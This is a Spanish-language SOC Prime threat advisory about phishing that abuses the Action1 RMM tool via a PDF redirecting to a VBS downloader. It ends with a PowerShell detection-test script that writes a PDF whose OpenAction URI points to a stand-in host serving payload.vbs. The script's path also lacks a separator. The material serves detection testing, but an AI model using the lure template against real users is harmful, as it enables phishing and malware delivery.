SOC Prime Bias: High

06 Oct 2026 14:36 UTC

El Abuso de Herramientas RMM Continúa Creciendo en Campañas de Amenazas Activas

Author Photo
SOC Prime Team linkedin icon Seguir
El Abuso de Herramientas RMM Continúa Creciendo en Campañas de Amenazas Activas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están abusando de herramientas de Gestión y Monitoreo Remoto (RMM), particularmente Action1, para establecer acceso persistente dentro de entornos comprometidos. El ataque comienza con un correo electrónico de phishing que contiene un PDF malicioso que redirige a las víctimas a un archivo VBS. El script luego descarga e instala un paquete MSI que contiene el agente legítimo de Action1, habilitando el acceso remoto no autorizado.

Investigación

La investigación descubrió un PDF malicioso que aprovecha las palabras clave OpenAction y URI para iniciar una descarga desde una URL alojada en Vercel. El análisis del paquete MSI recuperado reveló archivos legítimos de Action1 Corporation siendo mal utilizados a través de la propia infraestructura en la nube del proveedor. El agente instalado contiene un CustomerID específico y se comunica con un dominio legítimo de Action1.

Mitigación

Las organizaciones deben configurar el filtrado de correos electrónicos para identificar estructuras sospechosas de PDF que contengan palabras clave como OpenAction o URI. Los equipos de seguridad deben monitorear para detectar instalaciones no autorizadas de herramientas RMM y la creación del servicio A1Agent. Bloquear conexiones a infraestructuras en la nube RMM inesperadas e identificar CustomerIDs inusuales o no autorizados puede reducir aún más el riesgo de abuso de acceso remoto.

Respuesta

Cuando se detecta actividad maliciosa de RMM, aísle el host afectado para prevenir la ejecución adicional de comandos remotos. Investigue el correo electrónico de phishing originario y conduzca un análisis forense de los archivos VBS y MSI asociados. Revoque credenciales potencialmente comprometidas y revise las configuraciones del agente de Action1 en busca de indicadores de acceso remoto no autorizado o persistencia.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

LOLBAS WScript / CScript (mediante creación de procesos)

Equipo de SOC Prime
06 Oct 2026

Software de Acceso / Gestión Remota Alternativa (mediante creación de procesos)

Equipo de SOC Prime
06 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (mediante proxy)

Equipo de SOC Prime
06 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (mediante dns)

Equipo de SOC Prime
06 Oct 2026

Posible Actividad de Comando y Control por Intento de Comunicación de Dominio de Software de Acceso Remoto (mediante dns)

Equipo de SOC Prime
06 Oct 2026

IOCs (HashSha256) para detectar: Más Herramientas RMM en Libertad

Reglas de IA de SOC Prime
06 Oct 2026

Conexión remota a servidores corporativos de Action1 [Conexión de red de Windows]

Reglas de IA de SOC Prime
06 Oct 2026

PDF OpenAction y Redirección URI a VBS Malicioso [Evento de archivo de Windows]

Reglas de IA de SOC Prime
06 Oct 2026

Ejecución de Simulación

  • Narrativa del Ataque y Comandos: El adversario está simulando una campaña de phishing. El objetivo es entregar un archivo llamado Recibo de Transacción .pdf a una víctima. El PDF está diseñado de tal manera que en cuanto el usuario lo abre, el comando /OpenAction se activa un /URI redireccionamiento. Este redireccionamiento está diseñado para llevar al usuario a un sitio que sirva un VBScript malicioso. Para activar la regla de detección específica proporcionada, crearemos un archivo con el nombre y cadenas internas exactas requeridas.

  • Script de Prueba de Regresión:

    # Script de Simulación: Activación de la Detección de PDF OpenAction
    $targetFile = "$env:USERPROFILEDesktopRecibo de Transacción .pdf"
    
    # Creación del contenido PDF "malicioso" para coincidir con las palabras clave de detección
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Escritura del archivo en disco para activar la detección 'file_event'
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Archivo de simulación creado en: $targetFile"
    Write-Host "Revise su SIEM para la alerta de detección."
  • Comandos de Limpieza:

    # Limpieza: Remover el archivo simulado malicioso
    $targetFile = "$env:USERPROFILEDesktopRecibo de Transacción .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Limpieza completa: $targetFile removido."
    } else {
        Write-Host "Limpieza: Archivo no encontrado."
    }